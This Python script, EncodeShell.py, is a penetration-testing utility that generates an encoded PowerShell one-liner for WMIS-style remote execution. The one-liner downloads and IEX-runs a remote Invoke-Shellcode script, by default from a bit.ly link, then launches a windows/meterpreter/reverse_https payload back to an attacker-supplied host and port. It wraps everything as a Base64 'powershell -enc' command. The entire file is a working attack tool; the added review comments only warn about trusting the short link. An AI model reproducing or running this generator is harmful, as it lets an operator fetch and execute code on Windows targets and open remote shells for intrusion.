  1. #!/usr/bin/env python
  2. #
  3. # EncodeShell.py
  4. # Simple python script to output meterpreter commands for WMIS
  5. # by Chris Campbell (obscuresec)
  6. #
  7. import base64
  8. import sys
  9.  
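def build(url, lhost, lport):
    """Build the encoded PowerShell one-liner that stages Invoke-Shellcode.

    The generated script downloads ``url`` with ``Net.WebClient`` and runs it
    straight through ``IEX``, then calls ``Invoke-Shellcode`` with a
    ``windows/meterpreter/reverse_https`` payload pointed at ``lhost``/``lport``.
    The script is printed in clear, then returned wrapped as
    ``cmd.exe /c powershell.exe -nop -nol -enc <base64>``.

    Args:
        url: URL the target will fetch and execute (PowerSploit's
            Invoke-Shellcode is what the script expects to find there).
        lhost: handler address; interpolated verbatim, not validated.
        lport: handler port; interpolated verbatim, not validated.

    Returns:
        The full cmd.exe command line as a str. It is returned even when it
        exceeds the cmd.exe length limit; only a warning is printed.
    """
    # The URL lands inside a PowerShell single-quoted string, where a literal
    # ' is written as ''. Without this a ' in the URL (e.g. in a query string)
    # ends the literal early and the rest of the URL is parsed as PowerShell.
    quoted_url = url.replace("'", "''")

    script = "IEX (New-Object Net.WebClient).DownloadString('{0}'); Invoke-Shellcode ".format(quoted_url)
    script += "-Payload windows/meterpreter/reverse_https -Lhost {0} -Lport {1} -Force".format(lhost, lport)

    print("The powershell syntax to be run:")
    print("")
    print(script)
    print("")

    # powershell.exe -enc expects Base64 of the script's UTF-16LE bytes.
    # .decode('ascii') keeps the result a text string on both Python 2 and 3
    # (on Python 3 b64encode returns bytes, which would otherwise format as b'...').
    encoded = base64.b64encode(script.encode('utf_16_le')).decode('ascii')

    cmd = "cmd.exe /c powershell.exe -nop -nol -enc {0}".format(encoded)

    # cmd.exe refuses command lines longer than 8191 characters
    # (http://support.microsoft.com/kb/830473). A long URL blows this up fast
    # because the UTF-16LE + Base64 encoding roughly triples its length.
    # NOTE(review): a URL shortener shortens the line, but it also hands
    # control of the code IEX will run to whoever controls the short link.
    if len(cmd) > 8191:
        print("The length of the command is too long to use! Limit is 8191")
        print("Try using a URL shortener.")
    return cmd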
  36.  
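def main(argv=None):
    """Command-line entry point: ``EncodeShell.py LHOST LPORT URL``.

    Reads the handler address, port and payload URL from ``argv`` (defaults
    to ``sys.argv``), builds the encoded one-liner via ``build`` and prints
    it. Prints usage and returns when an argument is missing.

    Args:
        argv: argument vector including the program name; ``None`` means
            ``sys.argv``.
    """
    if argv is None:
        argv = sys.argv

    # Only the argument lookups can raise IndexError; keep the try tight so
    # an IndexError from anywhere else is not mistaken for bad usage.
    try:
        lhost = argv[1]
        lport = argv[2]
        url = argv[3]
    except IndexError:
        print("python EncodeShell.py lhost lport url")
        print("ex: python EncodeShell.py '192.168.4.5' '443' 'default'")
        print("ex: python EncodeShell.py '192.168.4.5' '443' 'http://192.168.4.5/powersploit/invoke-shellcode/'")
        return

    # 'default' resolves to the author's short link to Invoke-Shellcode.
    # NOTE(review): that is a third-party URL shortener reached over plain
    # HTTP, and the generated one-liner IEXes whatever it serves. Whoever
    # controls the short link's target, or the network path, controls the
    # code that runs on the target. Host the script yourself, over HTTPS.
    if url == 'default':
        url = 'http://bit.ly/14bZZ0c'

    ps = build(url, lhost, lport)

    print("The command is:")
    print("")
    print(ps)


if __name__ == "__main__":
    main()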